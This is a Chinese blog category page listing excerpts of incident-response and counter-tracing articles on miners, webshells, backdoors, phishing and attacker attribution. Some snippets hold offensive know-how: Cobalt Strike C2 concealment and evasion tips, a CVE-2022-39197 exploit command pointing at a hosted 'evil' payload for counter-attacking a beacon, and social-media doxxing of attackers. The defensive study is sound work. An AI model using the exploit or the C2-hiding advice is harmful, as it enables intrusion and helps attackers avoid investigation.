溯源反制与应急响应
文章平均质量分 85
蓝队相关技能
今天是 几号
剑未配妥 出门已是江湖
展开
-
记一次挖矿脚本应急排查
打完靶场记得及时清理 不过通过这种方式来收集一些样本,也是一个不错的选择。原创 2023-12-19 14:04:50 · 2040 阅读 · 0 评论 -
【溯源反制】CDN&域前置&云函数-流量分析|溯源
1、不备案的域名+禁用不必要的域名解析记录(防止被溯源收集到更多信息)2、使用HTTPS通讯3、C2服务器混淆基础特征-修改profile配置文件,修改ssl证书4、CS服务端防火墙做策略,仅允许目标主机网段连接,防止其他网段主机对其进行扫描,防溯源5、加跳板、代理等,当然最重要的是免杀了……原创 2023-05-12 12:42:35 · 4118 阅读 · 2 评论 -
【应急响应】日志自动提取分析项目&ELK&Logkit&LogonTracer&Anolog等
1、七牛Logkit:(Windows&Linux&Mac等)支持的数据源(各类日志,各个系统,各个应用等)File: 读取文件中的日志数据,包括csv格式的文件,kafka-rest日志文件,nginx日志文件等,并支持以grok的方式解析日志。2、观星应急工具:(Windows系统日志)SglabIr_Collector是qax旗下的一款应急响应日志收集工具,能够快速收集服务器日志,并自动打包,将收集的文件上传观心平台即可自动分析。原创 2023-05-03 16:19:04 · 3001 阅读 · 0 评论 -
【应急响应】挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题,而且服务器CPU的使用率异常高,运维人员认为该公司服务器可能被黑客入侵了,现小李向XX安全公司求助,解决网站跳转问题。某天客户反馈:服务器疑似被入侵,风扇噪声很大,实验室因耗电量太大经常跳闸,服务器疑似被挖矿。挖矿程序定位定性,时间分析,排查安全漏洞,攻击IP找到等。3、删除市场上已知挖矿脚本(恶意竞争了,属于是)危害:CPU拉满,网络阻塞,服务器卡顿、耗电等。原创 2023-04-25 12:38:37 · 3000 阅读 · 0 评论 -
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
主机层面后门&Web层面后门&权限维持类后门。主机层面后门&Web层面后门&权限维持类后门# Windows实验1、常规MSF后门-分析检测2、权限维持后门-分析检测3、Web程序内存马-分析检测常见工具集合:原创 2023-04-24 18:16:53 · 1592 阅读 · 0 评论 -
【应急响应】拒绝服务&钓鱼指南&DDOS压力测试&邮件反制分析&应用日志
红队APT钓鱼邮件内容分析(邮件源代码 发送方IP、X-Mailer、钓鱼工具Gophish、指纹特征等)3、根据域名寻找邮件服务器地址(利用红队手段渗透获取信息)1、协议口令爆破事件(以SQLserver、RDP为例)了解:数据库日志,系统日志,中间件日志,其他应用日志等。2、口令传递横向事件(演示域内横向移动日志记录)防御手段:CC防火墙,CDN服务,高防服务等。2、看发送IP地址(服务器IP或攻击IP)1、看发信人地址(邮件代发、相似域名)1、看指纹信息(什么发送工具平台)原创 2023-04-23 12:49:18 · 864 阅读 · 0 评论 -
【应急响应】战中溯源反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?)```bashpython cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv原创 2023-04-20 19:31:19 · 1920 阅读 · 0 评论 -
应急响应-战后溯源反制&社会工程学&IP&ID追踪&URL反查&攻击画像
(4) 微博搜索(如果发现有微博记录,可使用tg查询weibo泄露数据)(7) 豆瓣/贴吧/知乎/脉脉 你能知道的所有社交平台,进行信息收集。在社交平台上查找,(微信/微博/linkedin/twitter)(5) 微信ID收集:微信进行ID搜索(直接发钉钉群一起查)2、微信搜索 -> 微信ID可能是攻击者的ID,甚至照片。如后门的密码,源码中的注释,反编译分析的特殊字符串等。技术博客(csdn,博客园),src平台(补天)这是昨天的域前置后门(只是做了域前置,未做免杀)原创 2023-04-19 19:00:28 · 626 阅读 · 0 评论 -
【应急响应】网站入侵篡改指南&Webshell内存马查杀&漏洞排查&时间分析
并且gsl.aspx webshell实体被删除后,仍然可以连接正常使用,且无法扫描出内存马。aspx内存马查杀项目:ASP.NET-Memshell-Scanner-master。在日志里进行搜索,那些ip访问了gsl.aspx等后门文件。被注入内存马之后,使用gsl可以直接连接任何路径"后门"火绒,管家,X60,Defender,Nod32等。5、在线webshell查杀-灭绝师太版。4、网页篡改与后门攻击防范应对指南。1、抗拒绝服务攻击防范应对指南。8、APT攻击入侵防范应对指南。原创 2023-03-14 13:39:33 · 2074 阅读 · 0 评论